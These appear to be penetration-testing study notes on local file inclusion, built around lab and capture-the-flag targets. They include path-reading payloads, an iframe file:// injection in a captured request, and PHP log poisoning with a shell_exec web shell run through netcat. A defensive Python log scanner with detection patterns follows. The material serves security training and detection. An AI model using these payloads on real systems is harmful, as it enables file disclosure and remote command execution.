Simple LFI
If a URL parameter accepts user input, we can try to reference a system file and check whether the application returns its contents:
http://10.11.1.35/section.php?page=/etc/passwd
http://10.11.1.35/section.php?page=C:\Windows\win.ini
iframe LFI <img src=///etc/passwd>
If we find an entry point that renders our input inside a frame, we can try a payload like the following to check whether it is possible to read files on the machine:
POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 199
Connection: close
Cookie: connect.sid=s%3AyGd29rDOOta_oSwfj5BOgTjQThwvLm0v.1A9F%2BB%2FN8%2FuDhxgwLoT2Uj1rAHgU60MB5c2irg%2F3Vpk
{"basket":[{"_id":"638f116eeb060210cbd83a20","title":"<iframe src=file:///etc/passwd height=1000px width=800px></iframe>","description":"It's a red cup.","image":"red-cup.jpg","price":32,"currentStock":4,"__v":0,"amount":1}]}
Examples: [[Stocker#^ab97bc]]
PHP Log Poisoning
Contaminating Log Files
Let’s use Netcat to connect to our Windows 10 lab machine on port 80 with an interesting payload:
kali@kali:~$ nc -nv 10.11.0.22 80
(UNKNOWN) [10.11.0.22] 80 (http) open
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
HTTP/1.1 400 Bad Request
We can view these logs by opening C:\xampp\apache\logs\access.log or by using the XAMPP Control Panel.
Our payload should be found near the end of the log file:
10.11.0.4 - - [30/Nov/2019:13:55:12 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 155758 "http://10.11.0.22/menu.php?file=\\Windows\\System32\\drivers\\etc\\hosts" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.11.0.4 - - [30/Nov/2019:13:58:07 -0500] "GET /tacotruck.php HTTP/1.1" 200 1189 "http://10.11.0.22/menu.php?file=/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.11.0.4 - - [30/Nov/2019:14:01:41 -0500] ""<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>\n" 400 981 "-" "-"
Since our payload has been logged, we can attempt LFI execution. Next, we'll use the LFI vulnerability to include the Apache access.log file that contains our PHP payload. We know the application is using an include statement, so the contents of the included file will be executed as PHP code. We'll build a URL that includes the location of the log as well as the command to be executed (ipconfig), sent as the value of the cmd parameter.
http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
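From the defender's side, both steps above leave traces in the same access log. The following Python script is an added example (not part of the original notes) that scans Apache combined-format log lines like those shown and flags the two signals worth alerting on: a parameter value that points outside the web root (traversal, absolute path, drive letter, a known sensitive file) and a raw PHP tag written into the log, which is the poisoning precursor. The log lines it reads are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in the Apache combined log format (not real traffic).
SAMPLE_LOG = r'''10.11.0.4 - - [30/Nov/2019:13:50:01 -0500] "GET /menu.php?file=about HTTP/1.1" 200 1189 "-" "Mozilla/5.0"
10.11.0.4 - - [30/Nov/2019:13:55:12 -0500] "GET /menu.php?file=\Windows\System32\drivers\etc\hosts HTTP/1.1" 200 400 "-" "Mozilla/5.0"
10.11.0.4 - - [30/Nov/2019:14:01:41 -0500] ""<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>\n" 400 981 "-" "-"
10.11.0.4 - - [30/Nov/2019:14:03:09 -0500] "GET /menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
'''

# client - - [timestamp] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*?)" (\d{3}) \S+ "[^"]*" "[^"]*"$')
REQUEST_RE = re.compile(r'^(?:GET|POST|HEAD|PUT|DELETE|OPTIONS|PATCH) (\S+) HTTP/\d\.\d$')
# Values that escape the web root: traversal, absolute path, drive letter, file: URL.
PATH_RE = re.compile(r'(\.\./|^/|^[a-z]:/|^file:)', re.I)
# Files the notes above try to read; extend with whatever your app must never serve.
SENSITIVE = ('/etc/passwd', 'win.ini', 'access.log', 'drivers/etc/hosts')


def scan_line(line):
    """Return the list of reasons this log line looks like LFI or log poisoning."""
    m = LINE_RE.match(line)
    if not m:
        return ['unparseable log line']
    request, status = m.group(3), m.group(4)
    reasons = []
    # A PHP open tag in the request field means someone wrote code into the log.
    if '<?php' in request.lower() or '<?=' in request:
        reasons.append('PHP tag written into the log (poisoning attempt)')
    r = REQUEST_RE.match(request)
    if not r:
        # Garbage sent instead of a request line (Apache answers 400 but still logs it).
        reasons.append('malformed request line (status %s)' % status)
        return reasons
    query = r.group(1).partition('?')[2]
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            # Decode a second time to catch double-encoded values; normalise slashes.
            decoded = unquote(value).replace('\\', '/').lower()
            if PATH_RE.search(decoded) or any(s in decoded for s in SENSITIVE):
                reasons.append('parameter %s=%r points outside the web root' % (name, value))
    return reasons


def scan_log(text):
    """Map 1-based line numbers to detection reasons, omitting clean lines."""
    findings = {}
    for number, line in enumerate(text.splitlines(), 1):
        reasons = scan_line(line)
        if reasons:
            findings[number] = reasons
    return findings


if __name__ == '__main__':
    for number, reasons in scan_log(SAMPLE_LOG).items():
        print(number, '; '.join(reasons))
```

A hit on the PHP-tag check followed by a later request whose parameter names the log file itself is the full chain described above and deserves a higher-severity alert than either signal alone.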